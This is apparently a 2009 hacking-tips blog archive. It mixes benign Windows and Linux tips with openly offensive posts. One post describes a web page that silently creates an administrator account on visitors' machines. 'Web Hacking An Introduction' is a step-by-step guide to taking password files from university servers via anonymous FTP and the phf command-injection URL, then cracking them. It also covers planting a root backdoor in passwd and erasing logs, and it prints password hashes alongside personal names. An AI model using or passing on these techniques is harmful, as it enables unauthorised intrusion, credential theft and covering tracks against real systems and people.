Subscribe:
    Subscribe Twitter Facebook

    Tuesday, November 24, 2009

    Automatically mount your Linux partition in Windows



    Linux drive image
    You can automatically mount your Linux partition in Windows and have read/write functionality with a freeware application called Ext2Fsd. I will take you through the process of mounting your Linux partition using Windows XP.
    After you install Ext2Fsd you need to mount the Linux partition. Mount the Linux partition by opening Command Prompt and typing the following:
    mount 0 1 L:

    Note: the “0″ above is a zero.
    If you get a response like the following, the mount worked and you will be able to access your Linux partition in My Computer.
    Mount Linux image
    I will explain the above commands. The mount command is pretty obvious, and mounts your partition. The zero references your hard drive. If you are like most users and only use one hard drive, then you will want to leave the zero. If you use multiple hard drives then you will need to change that number appropriately.




    The 1 following the zero references the specific partition on your hard drive that Linux resides on. If you are like most users, your Linux partition is the first partition on your hard drive (so you can use GRUB by default) and you will not need to change this number. If Linux is your second or third partition, then you will need to change the number appropriately.
    Lastly, the “L:” is just a notation to give your hard drive a letter in My Computer. I like to use L because it “stands” for Linux. You can give your drive whatever letter you like, however, do not choose C because it will freeze your Windows partition (however, no permanent damage will occur).
    Linux bat image


    In order to automatically mount your partition when you log into Windows you will need to create a batch file. Open a file in notepad and type the following command (you can download my batch file if you prefer):
    mount 0 1 L:
    Save the file with the name linuxpartition.bat. Exit Notepad and right-click linuxpartition.bat and create a shortcut. Drag the shortcut into your Startup folder and your Linux partition will be automatically mounted when you start Windows.
    Startup image



    even I have tried it and the easiest is the fs-driver.
    works great. just install it and no need to type anything at all at the command line


    Monday, November 16, 2009

    Remote User Creation with Admin Rights

    I came across about a small trick which will create the User id with admin privileges in the victims computer using HTML in windows.

    The script provided in this article will create an "User ID" on the
    victim's machine with "administrator" privileges. It is a local
    system exploit which can be tweaked to exploit systems remotely. The
    hacker can upload this script to any free Webserver and then can
    trick it's victim to visit this link. Once the victim visits this
    malicious link, an user named "warrior" with password "kickass" will
    be created on the victim's system.

    MalScript: Sample WSH Script to create "User" with "administrator
    privileges"


    classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B>






    u can aslo use it on any pc. just make a page using dis coding and
    open it on dat pc

    its really amazing,try it out and reply.

    Value             : 10000111011001010100001100100001
    Bitwise Complement:  10010001101000101011001111000

    Monday, November 9, 2009

    fport : Port Scanner



    fport is a creation of foundstone. For information on how to download it go to the tools to detect hacking page.
    Download fport in your C:\ drive.
    Here is a picture of what you might see if you had Malware and used fport to see it:


    worm on fport

    The reason fport is superior to netstat is that it not only shows the ports that the worm is attempting to access but also the protocol and the application or malware. Once you know the name of the process you can use Task Manager to shut if off. Some apps/malware run as a system process and can only be deleted in Safe Mode.
    You will need to access the Command Prompt to use fport.
    To get to the Command Prompt go to Start | Run | type "cmd"
    The Command Prompt may automatically put you in your home directory. You'll need to be in the C:\ to use fport (actually, you'll need to be in whatever folder you downloaded fport in).
    Once in the same folder as fport type "fport."
    fport will list network connections and all the applications using them.
    MORE ON FPORT:
    FPort v1.33 - TCP/IP Process to Port Mapper
    Copyright 2000 by Foundstone, Inc.
    http://www.foundstone.com
    Usage:
    /p sort by port
    /a sort by application
    /i sort by pid
    /ap sort by application path


    what process is using a TCP port in Windows



    You may find yourself frequently going to network tools to determine traffic patterns from one server to another; Windows Servers (and earlier versions of Windows OS) can allow you to get that information locally on its connections. You can combine the netstat and tasklist commands to determine what process is using a port on the Windows Server.
    The following command will show what network traffic is in use at the port level:
    Netstat -a -n -o
    The -o parameter will display the associated process identifier (PID) using the port. This command will produce an output similar to what is in Figure 1.
    Figure 1
    Figure A
    With the PIDs listed in the netstat output, you can follow up with the Windows Task Manager (taskmgr.exe) or run a script with a specific PID that is using a port from the previous step. You can then use the tasklist command with the specific PID that corresponds to a port in question. From the previous example, ports 5800 and 5900 are used by PID 1812, so using the tasklist command will show you the process using the ports. Figure 2 shows this query.
    Figure 2
    Figure B
    This identifies VNC as the culprit to using the port. While a quick Google search on ports could possibly obtain the same result, this procedure can be extremely helpful when you’re trying to identify a viral process that may be running on the Windows Server.
     Else You can use Netstat -b to get the full task details like Port number and related PID of a Application or Image name



    Saturday, November 7, 2009

    Web Hacking An Introduction


    The Introduction on how to hack a website.

    Source: Hackers Library
    First of all you will need an ftp program such as ws_ftp. use Voyager FTP downloadable athttp://www.windows95.com/ it’s real simple and easy to use, so try it if you haven’t dealt with ftp before.  Now once you have the program find an address like http://www.shiga-pc.ac.jp you can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp this tells the search engine to give you all the academic addresses in Japan  ex.  ac=academic jp=Japan , you can try this with any country ex.  url:dk .  But for now let’s just focus on the Japanese servers. When u have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address ex.  http://www.shiga-pc.ac.jp  note..  You will have to log in anonymously.   You should then get a list of folders on the remote system usr, pub,etc, dev, bin.  See the etc folder? open it, once opened you should see some files passwd and group, open or view the file passwd (this is where the passwords for the system are stored), you should hopefully get something
    that looks like this:

    root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
    operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
    ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
    daemon:*:1:1:Mr Background:/:
    sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
    bin:PASSWORD HERE:3:4:Mr Binary:/bin:

    uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
    uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
    sso:Nologin:6:7:System Security Officer:/etc/security:
    news:Nologin:8:8:USENET News System:/usr/spool/netnews:
    sccs:PASSWORD HERE:9:10:Source Code Control:/:
    ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh

    rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
    rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
    jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
    lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
    nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
    llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
    grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
    nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
    delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh

    erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
    mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
    schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
    pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh

    dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
    This means you’ve hit the jackpot, in this case you should get a password cracker download one at (http://www.hackersweb.com go to the hacking toolz section), I would recommend for the beginning hacker to get a password cracker such as killer cracker because it’s extremely easy to use.  Once you have downloaded killer cracker you will need a dictionary file
    (get one at 
    http://www.hackersweb.com look in the extra toolz section), dictionary files are better the bigger they are so I would recommend (Basically this is a brute-forcing software)
    getting one at around 10 MB or more.  Now the passwords from the passwd file off the server you are hacking, you will need to save them to a file and place them in the same directory as Killer Cracker, you will also need to have your dictionary file in the same directory.  Now you are ready to go, just run killer cracker and tell it the name of the Pwfile=the password
    file and the name of the word file=your dictionary file, the valid file will be the file where the output of the password cracker will be put just give it a name such as crack.txt.  Once the cracker is done cracking the password files for you goto the valid file and take a look the file should look something like this

    root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh

    (remember this is an example). This file says that the username is root
    and the password is rootif the file had been like this.
    root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
    (remember again just an example) the login or username would be root and
    the password would be dumbass, well that’s it just ftp to the site using
    the login and password.  Note if you get root type in the following once
    you have logged in:-   echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
    this will allow you to login to the server with 1:myserver so you
    get the admin suspicious when they see people login as root.  Hide yourself
    as much as possible, if you already have a shell then go through that first
    when loggin on, or telnet to the hacked site shell and then re-telnet to the
    hacked shell using the hacked shell, if you see what I mean, so your who
    appears as local host.  Also get some c scripts which delete your presence,
    erases you off logs etc.

    Now if you were not as lucky to get exactly the same password file as shown
    in the example above then maybe you got something like this.

    root:*:0:1:Operator:/:
    ftp:*:53:53:anonymous ftp:/pub:
    t2:*:201:201:Takaoka Tadashi:/pub:

    This means that the passwd file is shadowed, if this is the case then
    welcome to the administrators world of trying to stop hackers, this is
    where you cant really do anything.  However there is one thing to do
    sometimes in very rare cases there may be a folder on the remote system
    that can be accessed by an anonymous login called shadowed, shadow, or
    secret if this is the case the password files should be in there,
    congratulations.   If there isn’t a folder like this, and the passwd file
    is shadowed then bad luck, go to the next address on your list.

    Now that you have tried the first thing as shown above there are a couple
    of other methods you may also want to try one is FTP hacking shown below.

    Go to a dos prompt after you are connected to the internet .
    Type.
    ftp www.victim=the site address
    server will ask for a username press enter
    server will ask for a password press enter
    at the prompt type quote  user ftp
    then type
    quote cwd ~root
    then type
    quote pass ftp

    If you get in make sure you delete the log file they might look at it and
    see that you were on.  Once you get on the passwd file is in etc/passwd so
    type cd etc then type get passwd.  If you have done the above right and the
    server is old you will have root access.  By the way root is the highest
    security status you can have.

    Another good way of getting root or a shell at least is through browser
    hacking.  Again well use Japanese educational servers as our target. To do
    this you will need a browser such as Netscape or Internet Explorer, you
    will also need a telnet program, you can either download a telnet program
    at 
    http://www.windows95.com or use the one that already comes with dos.
    To access the telnet program that comes with dos go to your dos windows and
    type in telnet www.site.com  the site.com stand for the site you want to
    telnet to, it could be anything like 
    www.geidai.ac.jp or www.tulips.tsukuba.ac.jp.  You will also need a cracker program I would recommend using Killer Cracker and applying as above.

    Next thing you do is open your browser and run a search for url:ac.jp ,
    like explained above.  Again I would recommend making a big list of your
    targets.  Now when you have your targets we address type it in your browser
    and add this to it.

    http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    or
    http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    To all you out there who are slightly advanced, I know this is the phf
    technique and it is virtually dead, but you’ll be surprised where you can
    use this.

    This technique of finding the password file was first used in November 1996
    on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
    servers, so this won’t work on something like www.nasa.gov or most of the
    www.*.com sites.  But still works on many university servers outside Europe
    and the U.S.

    O.K.  Once the url is entered you will see a number of things:-
    Error 404
    Cgi-bin/phf is not found on this server (the most common one)
    Or
    Warning
    You do not have permission to view cgi-bin/phf?/ on this server
    There are a number of other things the server might say, but the thing you
    want it to say is this:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
    daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
    bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:fdn7:3:3:0000-Admin(0000):/:
    adm:dehf6:4:4:0000-Admin(0000):/var/adm:
    wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
    news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
    lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:cmvof:0:0:mail daemon user:/:
    uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:eoend:37:4:Network Admin:/usr/net/nls:
    nobody:ccvjcvj:60001:60001:uid no b

    etc.
    This means you have hit the jackpot!!!
    If you get something similar to this but all lines have something in common
    like the following:-

    Query Results
    /usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
    root:x:0:1:0000-Admin(0000):/:/bin/sh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    wnn:x:5:5:0000-Admin(0000):/var/adm:
    news:x:6:6:0000-Admin(0000):/usr/lib/news:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no b

    (notice the c) if you don’t know what this means it means the password
    file is shadowed and you cannot work out ht epasswords for a shadowed
    password file then you’re in bad luck, I would recommend trying the ftp
    hack prior to this for the best results.

    If some but not all logins have a * in them then it’s ok, it’s worth while
    getting the ones which aren’t shadowed, hey a shell is a shell!!!

    If you want to use your newly acquired shells then telnet to the site and
    put in the login and the password (remember you have to crack the password
    file first explained at the top).



    U can able to See Hidden Files even if u effected by virus


    We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’.
    It happens due to a small bug/virus which edits the Registry to create trouble for us.
    Here is how we can solve it :
    Go to Registry Edit
    [Start -> Run -> type "regedit"]
    Browse to :
    “HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder
    \Hidden\SHOWALL”




    and set the value of the key “Checked Value” as 1
    Open notepad,
    copy paste the following [between start and stop]:
    // START
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\Advanced\
    Folder\Hidden]

    “Text”=”@shell32.dll,-30499″
    “Type”=”group”
    “Bitmap”=hex(2):25,00,53,00,79,00,73,00, 74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
    00,25,00,5c,00,73,00,79,00,73,00,74,00, 65,00,6d,00,33,00,32,00,5c,00,53,00,\
    48,00,45,00,4c,00,4c,00,33,00,32,00,2e, 00,64,00,6c,00,6c,00,2c,00,34,00,00,\
    00
    “HelpID”=”shell.hlp#51131″
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
    \Hidden\NOHIDDEN]

    “RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”
    “Text”=”@shell32.dll,-30501″
    “Type”=”radio”
    “CheckedValue”=dword:00000002
    “ValueName”=”Hidden”
    “DefaultValue”=dword:00000002
    “HKeyRoot”=dword:80000001
    “HelpID”=”shell.hlp#51104″
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\Advanced\Folder
    \Hidden\SHOWALL]

    “RegPath”=”Software\\Microsoft\\Windows\\ CurrentVersion\\Explorer\\Advanced”
    “Text”=”@shell32.dll,-30500″
    “Type”=”radio”
    “CheckedValue”=dword:00000001
    “ValueName”=”Hidden”
    “DefaultValue”=dword:00000002
    “HKeyRoot”=dword:80000001
    “HelpID”=”shell.hlp#51105″
    // STOP
    Save it as whatever_u_want.reg
    Double Click on that file to solve the problem,
    it can be carried, mailed or kept as back-up too.
    (Please remove the space in between registry entries)

    Bidvertiser